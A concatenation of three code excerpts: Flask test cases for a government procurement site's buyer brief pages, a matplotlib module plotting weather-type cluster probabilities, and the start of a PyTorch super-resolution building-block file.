updated_by='<EMAIL>'
)
assert res.headers['Location'].endswith(
'buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234'
) is True
def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/description-of-work/organisation",
data={
"organisation": "GDS"
})
assert res.status_code == 404
assert not data_api_client.update_brief.called
def test_404_if_lot_does_not_allow_brief(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=False)
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/description-of-work/organisation",
data={
"title": "A new title"
})
assert res.status_code == 404
assert not data_api_client.update_brief.called
def test_404_if_lot_does_not_exist(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-octopuses/1234/edit/description-of-work/organisation",
data={
"title": "A new title"
})
assert res.status_code == 404
assert not data_api_client.update_brief.called
def test_404_if_framework_status_is_not_live(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='open',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/description-of-work/organisation",
data={
"title": "A new title"
})
assert res.status_code == 404
assert not data_api_client.update_brief.called
def test_404_if_brief_is_already_live(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief(status='live')
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/description-of-work/organisation",
data={
"title": "A new title"
})
assert res.status_code == 404
assert not data_api_client.update_brief.called
def test_404_if_question_does_not_exist(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/description-of-work/some-made-up-question",
data={
"title": "A new title"
})
assert res.status_code == 404
assert not data_api_client.update_brief.called
@mock.patch('app.buyers.views.buyers.data_api_client')
class TestPublishBrief(BaseApplicationTest):
def test_publish_brief(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
brief_json = api_stubs.brief(status="draft")
brief_questions = brief_json['briefs']
brief_questions.update({
'backgroundInformation': 'test background info',
'contractLength': 'A very long time',
'culturalFitCriteria': ['CULTURAL', 'FIT'],
'culturalWeighting': 10,
'essentialRequirements': 'Everything',
'evaluationType': 'test evaluation type',
'existingTeam': 'team team team',
'importantDates': 'Near future',
'numberOfSuppliers': 5,
'location': 'somewhere',
'organisation': 'test organisation',
'priceWeighting': 80,
'specialistRole': 'communicationsManager',
'specialistWork': 'work work work',
'startDate': 'startDate',
'summary': 'blah',
'technicalWeighting': 10,
'workingArrangements': 'arrangements',
'workplaceAddress': 'address',
})
data_api_client.get_brief.return_value = brief_json
res = self.client.post("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/publish")
assert res.status_code == 302
assert data_api_client.update_brief_status.called
assert res.location == "http://localhost/buyers/frameworks/digital-outcomes-and-specialists/" \
"requirements/digital-specialists/1234"
def test_publish_brief_with_unanswered_required_questions(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief(status="draft")
res = self.client.post("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/publish")
assert res.status_code == 400
assert not data_api_client.update_brief_status.called
def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/your-organisation",
data={
"organisation": "GDS"
})
assert res.status_code == 404
assert not data_api_client.update_brief.called
def test_publish_button_available_if_questions_answered(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
brief_json = api_stubs.brief(status="draft")
brief_questions = brief_json['briefs']
brief_questions.update({
'backgroundInformation': 'test background info',
'contractLength': 'A very long time',
'culturalFitCriteria': ['CULTURAL', 'FIT'],
'culturalWeighting': 10,
'essentialRequirements': 'Everything',
'evaluationType': 'test evaluation type',
'existingTeam': 'team team team',
'importantDates': 'Near future',
'location': 'somewhere',
'numberOfSuppliers': 3,
'organisation': 'test organisation',
'priceWeighting': 80,
'specialistRole': 'communicationsManager',
'specialistWork': 'work work work',
'startDate': 'startDate',
'summary': 'blah',
'technicalWeighting': 10,
'workingArrangements': 'arrangements',
'workplaceAddress': 'address',
})
data_api_client.get_brief.return_value = brief_json
res = self.client.get("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/publish")
page_html = res.get_data(as_text=True)
assert res.status_code == 200
assert 'Publish Requirements' in page_html, page_html
def test_publish_button_unavailable_if_questions_not_answered(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief(status="draft")
res = self.client.get("/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/publish")
page_html = res.get_data(as_text=True)
assert res.status_code == 200
assert 'Publish Requirements' not in page_html
@mock.patch('app.buyers.views.buyers.data_api_client')
class TestDeleteBriefSubmission(BaseApplicationTest):
def test_delete_brief_submission(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/delete"
)
assert res.status_code == 302
assert data_api_client.delete_brief.called
assert res.location == "http://localhost/buyers"
def test_404_if_framework_is_not_live(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='standstill',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/delete",
)
assert res.status_code == 404
assert not data_api_client.delete_brief.called
def test_cannot_delete_live_brief(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief(status='live')
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/delete",
)
assert res.status_code == 404
assert not data_api_client.delete_brief.called
def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True)
]
)
data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/delete",
data={"delete_confirmed": True})
assert res.status_code == 404
@mock.patch('app.buyers.views.buyers.data_api_client')
class TestBriefSummaryPage(BaseApplicationTest):
def test_show_draft_brief_summary_page(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
brief_json = api_stubs.brief(status="draft")
brief_json['briefs']['specialistRole'] = 'communicationsManager'
data_api_client.get_brief.return_value = brief_json
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 200
page_html = res.get_data(as_text=True)
document = html.fromstring(page_html)
assert (document.xpath('//h1')[0]).text_content().strip() == "I need a thing to do a thing"
assert [e.text_content() for e in document.xpath('//main[@id="content"]//ul/li/a')] == [
'title',
'specialist role',
'location',
'description of work',
'shortlist criteria',
'evaluation criteria',
'Review and publish your requirements',
'How to answer supplier questions',
'How to shortlist suppliers',
'How to evaluate suppliers',
'How to award a contract',
]
assert document.xpath('//a[contains(text(), "Delete")]')
def test_show_live_brief_summary_page(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
brief_json = api_stubs.brief(status="live")
brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
brief_json['briefs']['specialistRole'] = 'communicationsManager'
brief_json['briefs']["clarificationQuestionsAreClosed"] = True
data_api_client.get_brief.return_value = brief_json
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 200
page_html = res.get_data(as_text=True)
document = html.fromstring(page_html)
assert (document.xpath('//h1')[0]).text_content().strip() == "I need a thing to do a thing"
assert [e.text_content() for e in document.xpath('//main[@id="content"]//ul/li/a')] == [
'View published requirements',
'Publish questions and answers',
'How to answer supplier questions',
'How to shortlist suppliers',
'How to evaluate suppliers',
'How to award a contract',
]
assert not document.xpath('//a[contains(text(), "Delete")]')
def test_show_closed_brief_summary_page(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
brief_json = api_stubs.brief(status="closed")
brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
brief_json['briefs']['specialistRole'] = 'communicationsManager'
brief_json['briefs']["clarificationQuestionsAreClosed"] = True
data_api_client.get_brief.return_value = brief_json
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 200
page_html = res.get_data(as_text=True)
document = html.fromstring(page_html)
assert (document.xpath('//h1')[0]).text_content().strip() == "I need a thing to do a thing"
assert [e.text_content() for e in document.xpath('//main[@id="content"]//ul/li/a')] == [
'View published requirements',
'View and shortlist suppliers',
'How to shortlist suppliers',
'How to evaluate suppliers',
'How to award a contract',
]
assert not document.xpath('//a[contains(text(), "Delete")]')
def test_show_clarification_questions_page_for_live_brief_with_no_questions(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
brief_json = api_stubs.brief(status="live")
brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
brief_json['briefs']["clarificationQuestionsAreClosed"] = False
data_api_client.get_brief.return_value = brief_json
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/supplier-questions" # noqa
)
assert res.status_code == 200
page_html = res.get_data(as_text=True)
assert "Supplier questions" in page_html
assert "No questions or answers have been published" in page_html
assert "Answer a supplier question" in page_html
def test_show_clarification_questions_page_for_live_brief_with_one_question(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
brief_json = api_stubs.brief(status="live", clarification_questions=[
{"question": "Why is my question a question?",
"answer": "Because",
"publishedAt": "2016-01-01T00:00:00.000000Z"}
])
brief_json['briefs']['publishedAt'] = "2016-04-02T20:10:00.00000Z"
brief_json['briefs']["clarificationQuestionsAreClosed"] = True
data_api_client.get_brief.return_value = brief_json
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/supplier-questions" # noqa
)
assert res.status_code == 200
page_html = res.get_data(as_text=True)
assert "Supplier questions" in page_html
assert "Why is my question a question?" in page_html
assert "Because" in page_html
assert "Answer a supplier question" in page_html
assert "No questions or answers have been published" not in page_html
def test_404_if_framework_does_not_allow_brief(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=False),
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 404
def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 404
@mock.patch("app.buyers.views.buyers.content_loader")
def test_links_to_sections_go_to_the_correct_pages_whether_they_be_sections_or_questions(self, content_loader, data_api_client): # noqa
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
content_fixture = ContentLoader('tests/fixtures/content')
content_fixture.load_manifest('dos', 'data', 'edit_brief')
content_loader.get_manifest.return_value = content_fixture.get_manifest('dos', 'edit_brief')
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 200
document = html.fromstring(res.get_data(as_text=True))
section_steps = document.xpath(
'//*[@id="content"]/div/div/ol[contains(@class, "instruction-list")]')
section_1_link = section_steps[0].xpath('li//a[contains(text(), "section 1")]')
section_2_link = section_steps[0].xpath('li//a[contains(text(), "section 2")]')
section_4_link = section_steps[0].xpath('li//a[contains(text(), "section 4")]')
# section with multiple questions
assert section_1_link[0].get('href').strip() == \
'/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/section-1'
# section | |
<filename>teslakit/plotting/wts.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# common
import os
import os.path as op
from datetime import datetime, timedelta
# pip
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.dates as mdates
import matplotlib.colors as mcolors
from matplotlib.colorbar import ColorbarBase
from matplotlib.ticker import MaxNLocator
# teslakit
from ..util.operations import GetBestRowsCols
from .custom_colors import GetClusterColors
from ..kma import ClusterProbabilities, ChangeProbabilities
from .outputs import axplot_compare_histograms
# import constants
from .config import _faspect, _fsize, _fdpi
def GenOneYearDaily(yy=1981, month_ini=1):
'returns one generic year in a list of datetimes. Daily resolution'
dp1 = datetime(yy, month_ini, 1)
dp2 = dp1+timedelta(days=365)
return [dp1 + timedelta(days=i) for i in range((dp2-dp1).days)]
def Generate_PerpYear_Matrix(num_clusters, bmus_values, bmus_dates,
num_sim=1, month_ini=1):
'''
Calculates and returns matrix for stacked bar plotting
bmus_dates - datetime.datetime (only works if daily resolution)
bmus_values has to be 2D (time, nsim)
'''
# generate perpetual year list
list_pyear = GenOneYearDaily(month_ini=month_ini)
# generate aux arrays
m_plot = np.zeros((num_clusters, len(list_pyear))) * np.nan
bmus_dates_months = np.array([d.month for d in bmus_dates])
bmus_dates_days = np.array([d.day for d in bmus_dates])
# sort data
for i, dpy in enumerate(list_pyear):
_, s = np.where(
[(bmus_dates_months == dpy.month) & (bmus_dates_days == dpy.day)]
)
b = bmus_values[s,:]
b = b.flatten()
for j in range(num_clusters):
_, bb = np.where([(j+1 == b)]) # j+1 starts at 1 bmus value!
m_plot[j,i] = float(len(bb)/float(num_sim))/len(s)
return m_plot
def axplot_PerpYear(ax, num_clusters, bmus_values, bmus_dates, num_sim, month_ini):
'axes plot bmus perpetual year'
# get cluster colors for stacked bar plot
np_colors_int = GetClusterColors(num_clusters)
# generate dateticks
x_val = GenOneYearDaily(month_ini = month_ini)
# generate plot matrix
m_plot = Generate_PerpYear_Matrix(
num_clusters, bmus_values, bmus_dates,
num_sim = num_sim, month_ini = month_ini)
# plot stacked bars
bottom_val = np.zeros(m_plot[1,:].shape)
for r in range(num_clusters):
row_val = m_plot[r,:]
ax.bar(
x_val, row_val, bottom = bottom_val,
width = 1, color = np.array([np_colors_int[r]])
)
# store bottom
bottom_val += row_val
# customize axis
months = mdates.MonthLocator()
monthsFmt = mdates.DateFormatter('%b')
ax.set_xlim(x_val[0], x_val[-1])
ax.xaxis.set_major_locator(months)
ax.xaxis.set_major_formatter(monthsFmt)
ax.set_ylim(0, 1)
ax.set_ylabel('')
def axplot_ChangeProbs(ax, change_probs, wt_colors,
ttl = '', vmin = 0, vmax = 1,
cmap = 'Blues', cbar_ttl = ''):
'axes plot cluster change probabilities'
num_clusters = change_probs.shape[0]
# clsuter transition plot
pc = ax.pcolor(
change_probs,
cmap=cmap, vmin=vmin, vmax=vmax,
)
# add colorbar
cbar = plt.colorbar(pc, ax=ax)
cbar.ax.tick_params(labelsize=8)
if vmin != 0 or vmax !=1:
cbar.set_ticks(np.linspace(vmin, vmax, 6))
cbar.ax.set_ylabel(cbar_ttl, rotation=270, labelpad=20)
# customize axes
ax.set_xticks(np.arange(num_clusters)+0.5)
ax.set_yticks(np.arange(num_clusters)+0.5)
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
# add custom color axis
ccmap = mcolors.ListedColormap([tuple(r) for r in wt_colors])
# custom color axis positions
ax_pos = ax.get_position()
cax_x_pos = [ax_pos.x0, ax_pos.y0-0.03, ax_pos.width, 0.02]
cax_y_pos = [ax_pos.x0-0.03/_faspect, ax_pos.y0, 0.02/_faspect, ax_pos.height]
# custom color axis X
cax_x = ax.figure.add_axes(cax_x_pos)
cbar_x = ColorbarBase(
cax_x, cmap = ccmap, orientation='horizontal',
norm = mcolors.Normalize(vmin=0, vmax=num_clusters),
)
cbar_x.set_ticks([])
# custom color axis Y
cax_y= ax.figure.add_axes(cax_y_pos)
cbar_y = ColorbarBase(
cax_y, cmap = ccmap, orientation='vertical',
norm = mcolors.Normalize(vmin=0, vmax=num_clusters),
)
cbar_y.set_ticks([])
def axplot_Transition(ax, probs_change_fit, probs_change_sim,
ttl='', color='black'):
'axes plot for scatter historical - simulation transition matrix comparison'
# clsuter transition fit vs. sim scatter plot
pc = ax.scatter(
probs_change_fit, probs_change_sim,
color=color, s=5, zorder=2,
)
# get max value for axis lim
axlim = np.ceil(10*np.max(probs_change_sim[:]))/10
# customize axes
ax.plot(([0,0],[1,1]), linestyle='dashed', linewidth=0.5, color='grey',
zorder=1)
ax.set_ylabel('Simulated', {'fontsize':8})
ax.set_xlabel('Historical', {'fontsize':8})
ax.grid(True, which='major', axis='both', linestyle='--', color='grey')
ax.tick_params(axis='both', which='major', labelsize=7)
ax.set_xlim([0, axlim])
ax.set_ylim([0, axlim])
ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
def axplot_ClusterProbs(ax, cluster_probs_fit, cluster_probs_sim, wt_colors,
ttl=''):
'axes plot for scatter historical - simulation cluster probs comparison'
# clsuter transition plot
for cf, cs, wc in zip(cluster_probs_fit, cluster_probs_sim, wt_colors):
ax.plot(cf, cs, marker='.', markersize=8, color=wc, zorder=2)
# get max value for axis lim
axlim = np.ceil(10*np.max(cluster_probs_sim[:]))/10
# customize axes
ax.plot(([0,0],[1,1]), linestyle='dashed', linewidth=0.5, color='grey',
zorder=1)
ax.set_ylabel('Simulated', {'fontsize':8})
ax.set_xlabel('Historical', {'fontsize':8})
ax.grid(True, which='major', axis='both', linestyle='--', color='grey')
ax.tick_params(axis='both', which='major', labelsize=7)
ax.set_xlim([0, axlim])
ax.set_ylim([0, axlim])
ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
def axplot_WT_Probs(ax, wt_probs,
ttl = '', vmin = 0, vmax = 0.1,
cmap = 'Blues', caxis='black'):
'axes plot WT cluster probabilities'
# clsuter transition plot
pc = ax.pcolor(
np.flipud(wt_probs),
cmap=cmap, vmin=vmin, vmax=vmax,
edgecolors='k',
)
# customize axes
ax.set_xticks([])
ax.set_yticks([])
ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
# axis color
plt.setp(ax.spines.values(), color=caxis)
plt.setp(
[ax.get_xticklines(), ax.get_yticklines()],
color=caxis,
)
# axis linewidth
if caxis != 'black':
plt.setp(ax.spines.values(), linewidth=3)
return pc
def axplot_WT_Hist(ax, bmus, n_clusters, ttl=''):
'axes plot WT cluster count histogram'
# cluster transition plot
ax.hist(
bmus,
bins = np.arange(1, n_clusters+2),
edgecolor='k'
)
# customize axes
#ax.grid('y')
ax.set_xticks(np.arange(1,n_clusters+1)+0.5)
ax.set_xticklabels(np.arange(1,n_clusters+1))
ax.set_xlim([1, n_clusters+1])
ax.tick_params(axis='both', which='major', labelsize=6)
ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
def Plot_Compare_PerpYear(num_clusters,
bmus_values_sim, bmus_dates_sim,
bmus_values_hist, bmus_dates_hist,
n_sim = 1, month_ini = 1, show=True):
'''
Plot simulated - historical bmus comparison in a perpetual year
bmus_dates requires 1 day resolution time
bmus_values set min value has to be 1 (not 0)
'''
# check dates have 1 day time resolution
td_h = bmus_dates_hist[1] - bmus_dates_hist[0]
td_s = bmus_dates_sim[1] - bmus_dates_sim[0]
if td_h.days != 1 or td_s.days != 1:
print('PerpetualYear bmus comparison skipped.')
print('timedelta (days): Hist - {0}, Sim - {1})'.format(
td_h.days, td_s.days))
return
# plot figure
fig, (ax_hist, ax_sim) = plt.subplots(2,1, figsize=(_faspect*_fsize, _fsize))
# historical perpetual year
axplot_PerpYear(
ax_hist, num_clusters, bmus_values_hist, bmus_dates_hist,
num_sim = 1, month_ini = month_ini,
)
ax_hist.set_title('Historical')
# simulated perpetual year
axplot_PerpYear(
ax_sim, num_clusters, bmus_values_sim, bmus_dates_sim,
num_sim = n_sim, month_ini = month_ini,
)
ax_sim.set_title('Simulation')
# add custom colorbar
np_colors_int = GetClusterColors(num_clusters)
ccmap = mcolors.ListedColormap(
[tuple(r) for r in np_colors_int]
)
cax = fig.add_axes([0.92, 0.125, 0.025, 0.755])
cbar = ColorbarBase(
cax, cmap=ccmap,
norm = mcolors.Normalize(vmin=0, vmax=num_clusters),
ticks = np.arange(num_clusters) + 0.5,
)
cbar.ax.tick_params(labelsize=8)
cbar.set_ticklabels(range(1, num_clusters + 1))
# text
fig.suptitle('Perpetual Year', fontweight='bold', fontsize=12)
# show and return figure
if show: plt.show()
return fig
def Plot_Compare_Transitions(num_clusters, bmus_values_hist, bmus_values_sim,
sttl=None, show=True):
'''
Plot many probabilities transition comparisons between 2 bmus series
bmus_values_hist, bmus_values_sim (series x n_sim) - bmus series to compare
num_clusters - total number of clusters at series
'''
# if n_sim > 1 lets safe-join simulated bmus for probs calcs.
n_sim = bmus_values_sim.shape[1]
if n_sim > 1:
# add nan splitter and then flatten
bmus_values_sim = np.append(
bmus_values_sim, np.zeros((1, n_sim))*np.nan,
axis = 0,
)
bmus_values_sim = bmus_values_sim.flatten('F')
# get cluster colors
wt_colors = GetClusterColors(num_clusters)
wt_set = np.arange(num_clusters) + 1
# cluster probabilities
probs_c_fit = ClusterProbabilities(bmus_values_hist, wt_set)
probs_c_sim = ClusterProbabilities(bmus_values_sim, wt_set)
# cluster change probabilities
_, chprobs_fit = ChangeProbabilities(bmus_values_hist, wt_set)
_, chprobs_rnd = ChangeProbabilities(bmus_values_sim, wt_set)
chprobs_dif = chprobs_rnd - chprobs_fit
# figure
fig = plt.figure(figsize=(_faspect*_fsize, _fsize))
# layout
gs = gridspec.GridSpec(2, 6, wspace=0.60, hspace=0.35)
ax_chpr_fit = plt.subplot(gs[0, :2])
ax_chpr_rnd = plt.subplot(gs[0, 2:4])
ax_chpr_dif = plt.subplot(gs[0, 4:])
ax_scat_tra = plt.subplot(gs[1, 1:3])
ax_scat_pbs = plt.subplot(gs[1, 3:5])
# cluster change probs axes
axplot_ChangeProbs(ax_chpr_fit, chprobs_fit, wt_colors,
'Historical WT Transition Probabilities')
axplot_ChangeProbs(ax_chpr_rnd, chprobs_rnd, wt_colors,
'Simulation WT Transition Probabilities')
axplot_ChangeProbs(ax_chpr_dif, chprobs_dif, wt_colors,
'Change in WT Transition Probabilities',
vmin=-0.05, vmax=0.05, cmap='RdBu_r',
cbar_ttl='Simulation - Historical',
)
# scatter plot transitions
axplot_Transition(ax_scat_tra, chprobs_fit, chprobs_rnd,
'Sim. vs. Hist. WT Transition Probabilities'
)
# scatter plot cluster probs
axplot_ClusterProbs(ax_scat_pbs, probs_c_fit, probs_c_sim, wt_colors,
'Sim. vs. Hist. WT Probabilities',
)
# suptitle
if sttl != None:
fig.suptitle(sttl, fontweight='bold', fontsize=12)
# show and return figure
if show: plt.show()
return fig
def Plot_Probs_WT_WT(series_1, series_2, n_clusters_1, n_clusters_2, ttl='',
wt_colors=False, show=True):
'''
Plot WTs_1 / WTs_2 probabilities
both categories series should start at 0
'''
# set of daily weather types
set_2 = np.arange(n_clusters_2)
# dailt weather types matrix rows and cols
n_rows, n_cols = GetBestRowsCols(n_clusters_2)
# get cluster colors
cs_wt = GetClusterColors(n_clusters_1)
# plot figure
fig = plt.figure(figsize=(_faspect*_fsize, _fsize/3))
gs = gridspec.GridSpec(1, n_clusters_1, wspace=0.10, hspace=0.15)
for ic in range(n_clusters_1):
# select DWT bmus at current AWT indexes
index_1 = np.where(series_1==ic)[0][:]
sel_2 = series_2[index_1]
# get DWT cluster probabilities
cps = ClusterProbabilities(sel_2, set_2)
C_T = np.reshape(cps, (n_rows, n_cols))
# axis colors
if wt_colors:
caxis = cs_wt[ic]
else:
caxis = 'black'
# plot axes
ax = plt.subplot(gs[0, ic])
axplot_WT_Probs(
ax, C_T,
ttl = 'WT {0}'.format(ic+1),
cmap = 'Reds', caxis = caxis,
)
ax.set_aspect('equal')
# add fig title
fig.suptitle(ttl, fontsize=14, fontweight='bold')
# show and return figure
if show: plt.show()
return fig
def Plot_Probs_WT_WT_anomaly(series_1, series_2, n_clusters_1, n_clusters_2, ttl='',
wt_colors=False, show=True):
'''
Plot WTs_1 / WTs_2 probabilities
both categories series should start at 0
'''
# set of daily weather types
set_2 = np.arange(n_clusters_2)
# dailt weather types matrix rows and cols
n_rows, n_cols = GetBestRowsCols(n_clusters_2)
# get cluster colors
cs_wt | |
'''
This repository is used to implement all blocks and tools for Efficient SR
@author
<NAME> from SIAT
<NAME> from SIAT
'''
from functools import partial
import torch
import torch.nn as nn
import math
import torch.nn.functional as F
from distutils.version import LooseVersion
# 1*1卷积使用nn.Linear实现
class DepthWiseConv(nn.Module):
def __init__(self, in_ch, out_ch, kernel_size=3, stride=1, padding=1,
dilation=1, bias=True, padding_mode="zeros", with_norm=True, bn_kwargs=None):
super(DepthWiseConv, self).__init__()
# 也相当于分组为1的分组卷积
self.depth_conv = nn.Conv2d(in_channels=in_ch,
out_channels=in_ch,
kernel_size=3,
stride=1,
padding=1,
groups=in_ch)
self.point_conv = nn.Linear(in_ch, out_ch)
# self.point_conv = nn.Conv2d(in_channels=in_ch,
# out_channels=out_ch,
# kernel_size=1,
# stride=1,
# padding=0,
# groups=1)
def forward(self, input):
out = self.depth_conv(input)
out = out.permute(0, 2, 3, 1)
out = self.point_conv(out)
out = out.permute(0, 3, 1, 2)
return out
class BSConvU(torch.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1,
dilation=1, bias=True, padding_mode="zeros", with_ln=True, bn_kwargs=None):
super().__init__()
self.with_ln = with_ln
# check arguments
if bn_kwargs is None:
